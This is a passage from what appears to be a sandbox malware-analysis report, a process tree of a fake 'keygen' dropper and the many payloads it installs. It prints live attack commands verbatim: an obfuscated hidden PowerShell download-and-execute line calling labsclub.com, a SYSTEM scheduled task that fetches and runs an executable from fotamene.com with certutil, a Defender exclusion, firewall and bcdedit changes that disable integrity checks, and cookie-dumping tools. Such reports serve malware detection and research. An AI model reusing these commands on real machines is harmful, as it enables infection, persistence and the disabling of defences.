- Executes dropped EXE
PID:3976

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
keygen-step-3.exe
3⤵
- Executes dropped EXE
PID:4772

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
4⤵
PID:4180

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
5⤵
- Runs ping.exe
PID:4116

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
keygen-step-4.exe
3⤵
- Executes dropped EXE
PID:3476

C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
4⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
PID:3748

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
5⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1316

C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe
C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe 200 installp1
5⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
PID:2288

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
6⤵
PID:2912

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
7⤵
- Kills process with taskkill
PID:212

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe"
6⤵
PID:636

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
7⤵
- Runs ping.exe
PID:4260

C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe
C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe 0011 installp1
5⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetThreadContext
- Checks SCSI registry key(s)
PID:2020

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
6⤵
PID:4548

C:\Users\Admin\AppData\Roaming\1615302222867.exe
"C:\Users\Admin\AppData\Roaming\1615302222867.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615302222867.txt"
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1428

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
6⤵
PID:4388

C:\Users\Admin\AppData\Roaming\1615302227961.exe
"C:\Users\Admin\AppData\Roaming\1615302227961.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615302227961.txt"
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4076

C:\Users\Admin\AppData\Roaming\1615302233851.exe
"C:\Users\Admin\AppData\Roaming\1615302233851.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615302233851.txt"
6⤵
- Executes dropped EXE
PID:5056

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
6⤵
PID:184

C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe
C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"
6⤵
PID:6696

C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe
"C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP
6⤵
PID:4236

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
5⤵
PID:4572

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
6⤵
- Runs ping.exe
PID:3456

C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
4⤵
- Executes dropped EXE
- Modifies system certificate store
PID:720

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
5⤵
PID:392

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
6⤵
- Kills process with taskkill
PID:4268

C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"
4⤵
- Executes dropped EXE
PID:4152

C:\Users\Admin\AppData\Local\Temp\C3JS02FMZM\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\C3JS02FMZM\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
5⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:4448

C:\Users\Admin\AppData\Local\Temp\C3JS02FMZM\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\C3JS02FMZM\multitimer.exe" 1 3.1615302019.60478d83187aa 101
6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4176

C:\Users\Admin\AppData\Local\Temp\C3JS02FMZM\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\C3JS02FMZM\multitimer.exe" 2 3.1615302019.60478d83187aa
7⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Maps connected drives based on registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:4516

C:\Users\Admin\AppData\Local\Temp\t1dhnvelzvv\jyqsk3wxebw.exe
"C:\Users\Admin\AppData\Local\Temp\t1dhnvelzvv\jyqsk3wxebw.exe" /VERYSILENT
8⤵
- Executes dropped EXE
PID:4496

C:\Users\Admin\AppData\Local\Temp\is-V9NJG.tmp\jyqsk3wxebw.tmp
"C:\Users\Admin\AppData\Local\Temp\is-V9NJG.tmp\jyqsk3wxebw.tmp" /SL5="$40444,870426,780800,C:\Users\Admin\AppData\Local\Temp\t1dhnvelzvv\jyqsk3wxebw.exe" /VERYSILENT
9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:4364

C:\Users\Admin\AppData\Local\Temp\is-DB3RB.tmp\winlthst.exe
"C:\Users\Admin\AppData\Local\Temp\is-DB3RB.tmp\winlthst.exe" test1 test1
10⤵
PID:5688

C:\Users\Admin\AppData\Local\Temp\aIhLZoPWD.exe
"C:\Users\Admin\AppData\Local\Temp\aIhLZoPWD.exe"
11⤵
PID:18904

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
12⤵
PID:19356

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fpte4xww\fpte4xww.cmdline"
13⤵
PID:1360

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9C24.tmp" "c:\Users\Admin\AppData\Local\Temp\fpte4xww\CSCD6D6DDC6C9EA41218CCD372216519A41.TMP"
14⤵
PID:3356

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yvf3kvul\yvf3kvul.cmdline"
13⤵
PID:16316

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB3A3.tmp" "c:\Users\Admin\AppData\Local\Temp\yvf3kvul\CSC9655F7F36B594FD2A5E37E63CA49944F.TMP"
14⤵
PID:10112

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
13⤵
PID:14092

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
13⤵
PID:4940

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
13⤵
PID:5784

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
11⤵
PID:19720

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
12⤵
PID:18992

C:\Users\Admin\AppData\Local\Temp\3onaczuelmq\askinstall24.exe
"C:\Users\Admin\AppData\Local\Temp\3onaczuelmq\askinstall24.exe"
8⤵
- Executes dropped EXE
PID:2776

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
9⤵
PID:2548

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
10⤵
PID:1292

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
10⤵
- Kills process with taskkill
PID:6140

C:\Users\Admin\AppData\Local\Temp\cgkgigz4aiv\ldkrviqikwo.exe
"C:\Users\Admin\AppData\Local\Temp\cgkgigz4aiv\ldkrviqikwo.exe" testparams
8⤵
PID:1560

C:\Users\Admin\AppData\Roaming\3vxs5kgpt4z\ov5mq0k5hbx.exe
"C:\Users\Admin\AppData\Roaming\3vxs5kgpt4z\ov5mq0k5hbx.exe" /VERYSILENT /p=testparams
9⤵
PID:6520

C:\Users\Admin\AppData\Local\Temp\is-DLA3V.tmp\ov5mq0k5hbx.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DLA3V.tmp\ov5mq0k5hbx.tmp" /SL5="$503F4,552809,216064,C:\Users\Admin\AppData\Roaming\3vxs5kgpt4z\ov5mq0k5hbx.exe" /VERYSILENT /p=testparams
10⤵
PID:6300

C:\Users\Admin\AppData\Local\Temp\iqo2c5ipso1\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\iqo2c5ipso1\Setup3310.exe" /Verysilent /subid=577
8⤵
- Executes dropped EXE
PID:5020

C:\Users\Admin\AppData\Local\Temp\is-VN4BV.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-VN4BV.tmp\Setup3310.tmp" /SL5="$403A4,802346,56832,C:\Users\Admin\AppData\Local\Temp\iqo2c5ipso1\Setup3310.exe" /Verysilent /subid=577
9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:4408

C:\Users\Admin\AppData\Local\Temp\is-I0R8Q.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-I0R8Q.tmp\Setup.exe" /Verysilent
10⤵
PID:6736

C:\Users\Admin\AppData\Local\Temp\is-VKVGJ.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-VKVGJ.tmp\Setup.tmp" /SL5="$30480,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-I0R8Q.tmp\Setup.exe" /Verysilent
11⤵
PID:6912

C:\Users\Admin\AppData\Local\Temp\is-A6HJE.tmp\PictureLAb.exe
"C:\Users\Admin\AppData\Local\Temp\is-A6HJE.tmp\PictureLAb.exe" /Verysilent
12⤵
PID:6904

C:\Users\Admin\AppData\Local\Temp\is-45MT6.tmp\PictureLAb.tmp
"C:\Users\Admin\AppData\Local\Temp\is-45MT6.tmp\PictureLAb.tmp" /SL5="$10826,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-A6HJE.tmp\PictureLAb.exe" /Verysilent
13⤵
PID:3332

C:\Users\Admin\AppData\Local\Temp\is-4PPTL.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-4PPTL.tmp\Setup.exe" /VERYSILENT
14⤵
PID:2572

C:\Users\Admin\AppData\Local\Temp\is-NLK3C.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-NLK3C.tmp\Setup.tmp" /SL5="$2082E,298255,214528,C:\Users\Admin\AppData\Local\Temp\is-4PPTL.tmp\Setup.exe" /VERYSILENT
15⤵
PID:4920

C:\Users\Admin\AppData\Local\Temp\is-87IVP.tmp\def.exe
"C:\Users\Admin\AppData\Local\Temp\is-87IVP.tmp\def.exe" /S /UID=lab214
16⤵
PID:5300

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
dw20.exe -x -s 1292
17⤵
PID:6868

C:\Users\Admin\AppData\Local\Temp\is-A6HJE.tmp\Delta.exe
"C:\Users\Admin\AppData\Local\Temp\is-A6HJE.tmp\Delta.exe" /Verysilent
12⤵
PID:7984

C:\Users\Admin\AppData\Local\Temp\is-9FP0M.tmp\Delta.tmp
"C:\Users\Admin\AppData\Local\Temp\is-9FP0M.tmp\Delta.tmp" /SL5="$304D2,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-A6HJE.tmp\Delta.exe" /Verysilent
13⤵
PID:8036

C:\Users\Admin\AppData\Local\Temp\is-7G80G.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-7G80G.tmp\Setup.exe" /VERYSILENT
14⤵
PID:7384

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-7G80G.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit
15⤵
PID:8136

C:\Windows\SysWOW64\taskkill.exe
taskkill /im Setup.exe /f
16⤵
- Kills process with taskkill
PID:2540

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
16⤵
- Delays execution with timeout.exe
PID:6824

C:\Users\Admin\AppData\Local\Temp\is-A6HJE.tmp\zznote.exe
"C:\Users\Admin\AppData\Local\Temp\is-A6HJE.tmp\zznote.exe" /Verysilent
12⤵
PID:4548

C:\Users\Admin\AppData\Local\Temp\is-G8PRK.tmp\zznote.tmp
"C:\Users\Admin\AppData\Local\Temp\is-G8PRK.tmp\zznote.tmp" /SL5="$3065C,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-A6HJE.tmp\zznote.exe" /Verysilent
13⤵
PID:4656

C:\Users\Admin\AppData\Local\Temp\is-T5FF1.tmp\jg4_4jaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-T5FF1.tmp\jg4_4jaa.exe" /silent
14⤵
PID:5656

C:\Users\Admin\AppData\Local\Temp\is-A6HJE.tmp\hjjgaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-A6HJE.tmp\hjjgaa.exe" /Verysilent
12⤵
PID:6732

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
13⤵
- Executes dropped EXE
PID:1560

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
13⤵
PID:4724

C:\Users\Admin\AppData\Local\Temp\sk0w12hbkix\qssl5kd2ioj.exe
"C:\Users\Admin\AppData\Local\Temp\sk0w12hbkix\qssl5kd2ioj.exe" /ustwo INSTALL
8⤵
PID:1680

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "qssl5kd2ioj.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\sk0w12hbkix\qssl5kd2ioj.exe" & exit
9⤵
PID:5564

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "qssl5kd2ioj.exe" /f
10⤵
- Kills process with taskkill
PID:7220

C:\Users\Admin\AppData\Local\Temp\uoovhhxqexr\0dt4gss5ysq.exe
"C:\Users\Admin\AppData\Local\Temp\uoovhhxqexr\0dt4gss5ysq.exe" 57a764d042bf8
8⤵
- Drops file in Program Files directory
PID:3380

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k "C:\Program Files\WPYV7RTWDJ\WPYV7RTWD.exe" 57a764d042bf8 & exit
9⤵
PID:6820

C:\Program Files\WPYV7RTWDJ\WPYV7RTWD.exe
"C:\Program Files\WPYV7RTWDJ\WPYV7RTWD.exe" 57a764d042bf8
10⤵
PID:5208

C:\Users\Admin\AppData\Local\Temp\mxmbtqf1t44\vict.exe
"C:\Users\Admin\AppData\Local\Temp\mxmbtqf1t44\vict.exe" /VERYSILENT /id=535
8⤵
- Executes dropped EXE
PID:2276

C:\Users\Admin\AppData\Local\Temp\is-M573N.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-M573N.tmp\vict.tmp" /SL5="$104AA,870426,780800,C:\Users\Admin\AppData\Local\Temp\mxmbtqf1t44\vict.exe" /VERYSILENT /id=535
9⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:5276

C:\Users\Admin\AppData\Local\Temp\is-H84CD.tmp\wimapi.exe
"C:\Users\Admin\AppData\Local\Temp\is-H84CD.tmp\wimapi.exe" 535
10⤵
PID:3912

C:\Users\Admin\AppData\Local\Temp\7UJz0Oslz.exe
"C:\Users\Admin\AppData\Local\Temp\7UJz0Oslz.exe"
11⤵
PID:18964

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
12⤵
PID:4912

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\o0ytfohd\o0ytfohd.cmdline"
13⤵
PID:7144

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2221.tmp" "c:\Users\Admin\AppData\Local\Temp\o0ytfohd\CSC1B6B606721240FE935A57ED30C88BFF.TMP"
14⤵
PID:12248

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pkx0j1wb\pkx0j1wb.cmdline"
13⤵
PID:3276

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5297.tmp" "c:\Users\Admin\AppData\Local\Temp\pkx0j1wb\CSC1780DD89452B4A638851C7E698E3ED32.TMP"
14⤵
PID:13972

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
13⤵
PID:16512

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
13⤵
PID:16184

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
13⤵
PID:20420

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
11⤵
PID:15904

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
12⤵
PID:16504

C:\Users\Admin\AppData\Local\Temp\kfbgda1bykf\chashepro3.exe
"C:\Users\Admin\AppData\Local\Temp\kfbgda1bykf\chashepro3.exe" /VERYSILENT
8⤵
- Executes dropped EXE
PID:4244

C:\Users\Admin\AppData\Local\Temp\zmkhhzhbvnc\IBInstaller_97039.exe
"C:\Users\Admin\AppData\Local\Temp\zmkhhzhbvnc\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
8⤵
PID:5184

C:\Users\Admin\AppData\Local\Temp\is-BBQT0.tmp\IBInstaller_97039.tmp
"C:\Users\Admin\AppData\Local\Temp\is-BBQT0.tmp\IBInstaller_97039.tmp" /SL5="$10526,14441882,721408,C:\Users\Admin\AppData\Local\Temp\zmkhhzhbvnc\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
9⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:5448

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c start http://gemstrue.shop/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
10⤵
PID:196

C:\Users\Admin\AppData\Local\Temp\is-JJDND.tmp\{app}\chrome_proxy.exe
"C:\Users\Admin\AppData\Local\Temp\is-JJDND.tmp\{app}\chrome_proxy.exe"
10⤵
PID:4740

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-JJDND.tmp\{app}\chrome_proxy.exe"
11⤵
PID:7080

C:\Windows\SysWOW64\PING.EXE
ping localhost -n 4
12⤵
- Runs ping.exe
PID:7036

C:\Users\Admin\AppData\Local\Temp\r5mq3yhiojn\app.exe
"C:\Users\Admin\AppData\Local\Temp\r5mq3yhiojn\app.exe" /8-23
8⤵
PID:5384

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Ancient-Paper"
9⤵
PID:7064

C:\Program Files (x86)\Ancient-Paper\7za.exe
"C:\Program Files (x86)\Ancient-Paper\7za.exe" e -p154.61.71.51 winamp-plugins.7z
9⤵
PID:7388

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Ancient-Paper\app.exe" -map "C:\Program Files (x86)\Ancient-Paper\WinmonProcessMonitor.sys""
9⤵
PID:8076

C:\Program Files (x86)\Ancient-Paper\app.exe
"C:\Program Files (x86)\Ancient-Paper\app.exe" -map "C:\Program Files (x86)\Ancient-Paper\WinmonProcessMonitor.sys"
10⤵
PID:5968

C:\Program Files (x86)\Ancient-Paper\7za.exe
"C:\Program Files (x86)\Ancient-Paper\7za.exe" e -p154.61.71.51 winamp.7z
9⤵
PID:2188

C:\Program Files (x86)\Ancient-Paper\app.exe
"C:\Program Files (x86)\Ancient-Paper\app.exe" /8-23
9⤵
PID:5760

C:\Program Files (x86)\Ancient-Paper\app.exe
"C:\Program Files (x86)\Ancient-Paper\app.exe" /8-23
10⤵
PID:6488

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
11⤵
PID:4728

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
12⤵
PID:6408

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /8-23
11⤵
PID:1940

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
12⤵
- Creates scheduled task(s)
PID:7096

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
12⤵
- Creates scheduled task(s)
PID:6980

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
12⤵
PID:7460

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
13⤵
- Modifies boot configuration data using bcdedit
PID:5596

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
13⤵
- Modifies boot configuration data using bcdedit
PID:11328

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
13⤵
- Modifies boot configuration data using bcdedit
PID:11392

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
13⤵
- Modifies boot configuration data using bcdedit
PID:11468

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
13⤵
- Modifies boot configuration data using bcdedit
PID:11552

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
13⤵
- Modifies boot configuration data using bcdedit
PID:11628

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
13⤵
- Modifies boot configuration data using bcdedit
PID:11716

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
13⤵
- Modifies boot configuration data using bcdedit
PID:11756

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
13⤵
- Modifies boot configuration data using bcdedit
PID:11792

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
13⤵
- Modifies boot configuration data using bcdedit
PID:11828

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
13⤵
- Modifies boot configuration data using bcdedit
PID:11864

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
13⤵
- Modifies boot configuration data using bcdedit
PID:11900

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
13⤵
- Modifies boot configuration data using bcdedit
PID:11936

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set bootmenupolicy legacy
13⤵
- Modifies boot configuration data using bcdedit
PID:11972

C:\Windows\System32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
12⤵
- Modifies boot configuration data using bcdedit
PID:12012

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
12⤵
PID:12240

C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
12⤵
PID:10452

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
13⤵
PID:10552

C:\Windows\SysWOW64\sc.exe
